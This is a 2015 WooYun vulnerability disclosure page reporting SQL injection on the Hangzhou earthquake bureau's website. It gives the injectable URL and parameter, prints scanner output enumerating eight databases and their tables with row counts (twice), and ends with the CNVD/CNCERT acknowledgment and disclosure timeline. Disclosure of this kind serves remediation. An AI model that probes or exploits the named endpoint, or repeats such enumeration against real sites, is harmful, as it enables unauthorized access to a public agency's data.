当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095335

漏洞标题:某市地震局存在SQL注射

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-02-04 12:58

修复时间:2015-03-21 13:00

公开时间:2015-03-21 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经确认,细节仅向厂商公开
2015-02-19: 细节向核心白帽子及相关领域专家公开
2015-03-01: 细节向普通白帽子公开
2015-03-11: 细节向实习白帽子公开
2015-03-21: 细节向公众公开

简要描述:

某市地震局存在SQL注射

详细说明:

存在:杭州市地震局
SQL连接:http://www.hzdzj.com/detail.php?title=%B9%AB%B8%E6%C0%B8&id=218&xh=3

1.png


1.png


available databases [8]:
[*] hzdz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] publish
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.RTblRelships                     | 6910    |
| dbo.RTblIfaceHier                    | 3345    |
| dbo.RTblVersionAdminInfo             | 2328    |
| dbo.RTblVersions                     | 2328    |
| dbo.RTblNamedObj                     | 2191    |
| dbo.RTblIfaceMem                     | 1186    |
| dbo.RTblPropDefs                     | 794     |
| dbo.RTblClassDefs                    | 537     |
| dbo.RTblIfaceDefs                    | 452     |
| dbo.RTblProps                        | 392     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 91      |
| dbo.RTblSites                        | 38      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 16      |
| dbo.backupfile                       | 4       |
| dbo.restorefile                      | 4       |
| dbo.syssegments                      | 3       |
| dbo.backupmediafamily                | 2       |
| dbo.backupmediaset                   | 2       |
| dbo.backupset                        | 2       |
| dbo.restorefilegroup                 | 2       |
| dbo.restorehistory                   | 2       |
| dbo.RTblDatabaseVersion              | 1       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2501    |
| dbo.spt_values                       | 727     |
| INFORMATION_SCHEMA.ROUTINES          | 705     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 8       |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: hzdz
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dz_info_eqk                      | 664     |
| dbo.news                             | 478     |
| dbo.answer                           | 395     |
| dbo.result                           | 395     |
| dbo.dz_info_others                   | 206     |
| dbo.dz_file                          | 173     |
| dbo.infon                            | 13      |
| dbo.dz_info_sort                     | 10      |
| dbo.sysconstraints                   | 4       |
| dbo.syssegments                      | 3       |
| dbo.dtest                            | 1       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+


1.png

漏洞证明:

1.png


available databases [8]:
[*] hzdz
[*] master
[*] model
[*] msdb
[*] Northwind
[*] publish
[*] pubs
[*] tempdb
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.RTblRelships                     | 6910    |
| dbo.RTblIfaceHier                    | 3345    |
| dbo.RTblVersionAdminInfo             | 2328    |
| dbo.RTblVersions                     | 2328    |
| dbo.RTblNamedObj                     | 2191    |
| dbo.RTblIfaceMem                     | 1186    |
| dbo.RTblPropDefs                     | 794     |
| dbo.RTblClassDefs                    | 537     |
| dbo.RTblIfaceDefs                    | 452     |
| dbo.RTblProps                        | 392     |
| dbo.RTblRelColDefs                   | 320     |
| dbo.RTblRelshipDefs                  | 144     |
| dbo.RTblParameterDef                 | 136     |
| dbo.sysconstraints                   | 91      |
| dbo.RTblSites                        | 38      |
| dbo.RTblRelshipProps                 | 28      |
| dbo.syscategories                    | 19      |
| dbo.RTblTypeLibs                     | 16      |
| dbo.backupfile                       | 4       |
| dbo.restorefile                      | 4       |
| dbo.syssegments                      | 3       |
| dbo.backupmediafamily                | 2       |
| dbo.backupmediaset                   | 2       |
| dbo.backupset                        | 2       |
| dbo.restorefilegroup                 | 2       |
| dbo.restorehistory                   | 2       |
| dbo.RTblDatabaseVersion              | 1       |
+--------------------------------------+---------+
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2501    |
| dbo.spt_values                       | 727     |
| INFORMATION_SCHEMA.ROUTINES          | 705     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| INFORMATION_SCHEMA.SCHEMATA          | 8       |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: hzdz
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dz_info_eqk                      | 664     |
| dbo.news                             | 478     |
| dbo.answer                           | 395     |
| dbo.result                           | 395     |
| dbo.dz_info_others                   | 206     |
| dbo.dz_file                          | 173     |
| dbo.infon                            | 13      |
| dbo.dz_info_sort                     | 10      |
| dbo.sysconstraints                   | 4       |
| dbo.syssegments                      | 3       |
| dbo.dtest                            | 1       |
+--------------------------------------+---------+
Database: Northwind
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.[Order Details Extended]         | 2155    |
| dbo.[Order Details]                  | 2155    |
| dbo.Invoices                         | 2155    |
| dbo.[Order Subtotals]                | 830     |
| dbo.[Orders Qry]                     | 830     |
| dbo.Orders                           | 830     |
| dbo.[Summary of Sales by Quarter]    | 809     |
| dbo.[Summary of Sales by Year]       | 809     |
| dbo.[Customer and Suppliers by City] | 120     |
| dbo.Customers                        | 91      |
| dbo.[Quarterly Orders]               | 86      |
| dbo.[Product Sales for 1997]         | 77      |
| dbo.[Sales by Category]              | 77      |
| dbo.Products                         | 77      |
| dbo.[Alphabetical list of products]  | 69      |
| dbo.[Current Product List]           | 69      |
| dbo.[Products by Category]           | 69      |
| dbo.[Sales Totals by Amount]         | 66      |
| dbo.Territories                      | 53      |
| dbo.EmployeeTerritories              | 49      |
| dbo.sysconstraints                   | 43      |
| dbo.Suppliers                        | 29      |
| dbo.[Products Above Average Price]   | 25      |
| dbo.Employees                        | 9       |
| dbo.[Category Sales for 1997]        | 8       |
| dbo.Categories                       | 8       |
| dbo.Region                           | 4       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+


1.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-02-09 10:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协助调网站管理单位处置。

最新状态:

暂无